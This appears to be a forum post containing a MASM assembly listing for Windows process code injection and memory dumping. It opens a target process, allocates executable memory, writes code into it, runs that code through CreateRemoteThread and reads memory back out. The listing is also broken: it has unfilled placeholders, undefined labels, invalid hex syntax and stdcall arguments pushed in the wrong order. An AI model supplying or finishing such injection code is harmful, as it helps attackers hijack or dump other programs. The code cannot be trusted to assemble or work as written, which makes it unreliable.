Код:
; Process Memory Injection and Dumper
.386
.model flat, stdcall
option casemap:none
include windows.inc
include kernel32.inc
includelib kernel32.lib
; Constants
PAGE_EXECUTE_READWRITE equ 0x40
MEM_COMMIT equ 0x1000
; Variables
lpAllocatedMemory dd 0
hProcess dd 0
lpCode dd offset myCode
dwCodeSize dd 32
lpMemoryAddress dd offset myMemoryAddress
lpBuffer dd offset myBuffer
dwBufferSize dd 1024
; Functions
ReadMemory proto lpBaseAddress:dword, lpBuffer:dword, nSize:dword
WriteMemory proto lpBaseAddress:dword, lpBuffer:dword, nSize:dword
.code
start:
; Open the target process
invoke OpenProcess, PROCESS_ALL_ACCESS, FALSE, <target_process_id>
mov hProcess, eax
; Allocate memory in the target process
push 0
push <memory_size>
push MEM_COMMIT
push PAGE_EXECUTE_READWRITE
push hProcess
call VirtualAllocEx
mov lpAllocatedMemory, eax
; Inject code into the target process
push lpAllocatedMemory
push offset lpCode
push <code_size>
push hProcess
call WriteProcessMemory
; Execute the injected code
push 0
push 0
push lpAllocatedMemory
push 0
push 0
push 0
push hProcess
call CreateRemoteThread
; Dump memory from the target process
push lpMemoryAddress
push lpBuffer
push dwBufferSize
push 0
push hProcess
call ReadProcessMemory
; Exit the program
invoke CloseHandle, hProcess
ret
; Read memory from the target process
ReadMemory proc lpBaseAddress:dword, lpBuffer:dword, nSize:dword
push ebp
mov ebp, esp
push 0
push hProcess
push[ebp+8]
push[ebp+12]
push[ebp+16]
call ReadProcessMemory
pop ebp
ret 12
ReadMemory endp
; Write memory to the target process
WriteMemory proc lpBaseAddress:dword, lpBuffer:dword, nSize:dword
push ebp
mov ebp, esp
push 0
push hProcess
push[ebp+8]
push[ebp+12]
push[ebp+16]
call WriteProcessMemory
pop ebp
ret 12
WriteMemory endp
end start